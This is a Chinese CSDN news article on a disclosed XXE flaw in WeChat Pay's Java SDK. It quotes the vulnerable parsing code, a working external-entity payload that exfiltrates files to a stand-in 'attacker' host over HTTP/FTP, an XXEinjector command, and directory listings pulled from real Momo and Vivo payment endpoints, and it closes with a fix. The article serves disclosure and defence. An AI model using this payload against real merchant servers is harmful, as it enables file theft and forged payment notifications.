今天，国外安全社区 Seclists.Org 里一名白帽子披露了微信支付官方 SDK 存在严重的 XXE 漏洞，可导致商家服务器被入侵，且黑客可避开真实支付通道，用虚假的支付通知来购买任意产品。

值得一提的是，这名白帽子不知如何联系微信安全团队人员，所以在 Twitter 上 @360Netlab，于是 360 代为转达了该漏洞。这就造成了在没有提前通知厂商的情况下就公布了这一漏洞。

什么是 XXE 漏洞？

XML 外部实体注入漏洞(XML External Entity Injection，简称 XXE)，是一种容易被忽视，但危害巨大的漏洞。它可以利用 XML 外部实体加载注入，执行不可预控的代码，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

微信 SDK 的 XXE 漏洞原理

通常，我们在使用微信支付时，商家会有一个通知的 URL 来接收异步支付结果。然而，微信在 JAVA 版本的 SDK 存在一个 XXE 漏洞来处理这个结果。由此攻击者可以向通知的 URL 中构建恶意的回调数据，以便根据需要窃取商家服务器上的任意信息。一旦攻击者获得商家的关键安全密钥（md5-key 和merchant-Id），那么他们可以通过发送伪造的信息来欺骗商家而无需付费购买任意商品。

影响范围

现已有陌陌、Vivo 已经验证被该漏洞影响。

受影响的版本有 JAVA SDK，WxPayAPI_JAVA_v3。

• 存在漏洞的 SDK 页面：https://pay.weixin.qq.com/wiki/doc/api/index.html

• JAVA SDK：https://pay.weixin.qq.com/wiki/doc/api/download/WxPayAPI_JAVA_v3.zip

• WxPayAPI_JAVA_v3：https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o6ud/view

漏洞详情

WxPayApi_JAVA_v3.zip 的 README.md 中显示了更多的细节：

   notify code example:

    [

        String notifyData = "....";

        MyConfig config = new MyConfig();

        WXPay wxpay = new WXPay(config);

//conver to map

        Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);


        if (wxpay.isPayResultNotifySignatureValid(notifyMap)) {

//do business logic

        }

        else {

         }



     ]

    WXPayUtil source code

   [


  public static Map<String, String> xmlToMap(String strXML) throws
Exception {

    try {

            Map<String, String> data = new HashMap<String, String>();

            /*** not disabled xxe *****/

            //start parse


            DocumentBuilderFactory documentBuilderFactory =
DocumentBuilderFactory.newInstance();

            DocumentBuilder documentBuilder =
documentBuilderFactory.newDocumentBuilder();

            InputStream stream = new ByteArrayInputStream(strXML.getBytes(
"UTF-8"));

            org.w3c.dom.Document doc = documentBuilder.parse(stream);



           //end parse





            doc.getDocumentElement().normalize();

            NodeList nodeList = doc.getDocumentElement().getChildNodes();

            for (int idx = 0; idx < nodeList.getLength(); ++idx) {

                Node node = nodeList.item(idx);

                if (node.getNodeType() == Node.ELEMENT_NODE) {

                    org.w3c.dom.Element element = (org.w3c.dom.Element) node
;

                    data.put(element.getNodeName(), element.getTextContent
());

                }

            }

            try {

                stream.close();

            } catch (Exception ex) {

                // do nothing

            }

            return data;

        } catch (Exception ex) {

            WXPayUtil.getLogger().warn("Invalid XML, can not convert to
map. Error message: {}. XML content: {}", ex.getMessage(), strXML);

            throw ex;

        }

    }

]

发布有效的商家通知 URL：

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [

  <!ENTITY % attack SYSTEM "file:///etc/">

  <!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd";>

  %xxe;

]>

data.dtd:

<!ENTITY % shell "<!ENTITY &#x25; upload SYSTEM 'ftp://attack:33/%attack;
'>">

%shell;

%upload;

或使用 XXEinjector 工具：https://github.com/enjoiz/XXEinjector 以检测：

ruby XXEinjector.rb --host=attacker --path=/etc   --file=req.txt --ssl


req.txt :

POST merchant_notification_url HTTP/1.1

Host:  merchant_notification_url_host

User-Agent: curl/7.43.0

Accept: */*

Content-Length: 57

Content-Type: application/x-www-form-urlencoded


XXEINJECT

陌陌案例：

 attack:

     notify url:    https://pay.immomo.com/weixin/notify

              cmd:  /home/



      result:



      ***

      logs

      zhang.jiax**

      zhang.shaol**

      zhang.xia**

      ****


    attack:

     notify url:    https://pay.immomo.com/weixin/notify

              cmd:  /home/logs



      result:

      ***

       moa-service

       momotrace

      ****

Vivo 案例：

 attack:

     notify url:   https://pay.vivo.com.cn/webpay/wechat/callback.oo

              cmd: /home/



      result:

         tomcat


  attack:

     notify url:   https://pay.vivo.com.cn/webpay/wechat/callback.oo

              cmd: /home/tomcat

     result:

        .bash_logout

.bash_profile

.bashrc

logs


 attack:

     notify url:   https://pay.vivo.com.cn/webpay/wechat/callback.oo

              cmd: /home/tomcat/logs

     result:

           ****

           tomcat-2018-06-28.log

  tomcat-2018-06-29.log

  tomcat-2018-06-30.log

           *****

修复建议

用户可使用开发语言提供的禁用外部实体的方法。Java 禁用外部实体的代码如下：

DocumentBuilderFactory dbf=DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

写在最后

目前，我们已经向微信支付的相关技术专家证实这一漏洞的存在，其表示正在紧急修复中。当然普通的用户也不用太过担心，受影响的是使用微信支付的部分网站，如果相关的企业使用的不是官方提供的 Java 版 SDK，也没有太大的问题。不过，XXE 漏洞并非第一次出现，但是一直以来，仍未得到重视，这也是作为开发者的我们需要反思的地方。

参考：

• http://seclists.org/fulldisclosure/2018/Jul/3

 征稿啦！

CSDN 公众号秉持着「与千万技术人共成长」理念，不仅以「极客头条」、「畅言」栏目在第一时间以技术人的独特视角描述技术人关心的行业焦点事件，更有「技术头条」专栏，深度解读行业内的热门技术与场景应用，让所有的开发者紧跟技术潮流，保持警醒的技术嗅觉，对行业趋势、技术有更为全面的认知。
如果你有优质的文章，或是行业热点事件、技术趋势的真知灼见，或是深度的应用实践、场景方案等的新见解，欢迎联系 CSDN 投稿，联系方式：微信（guorui_1118，请备注投稿+姓名+公司职位），邮箱（guorui@csdn.net）。

————— 推荐阅读 —————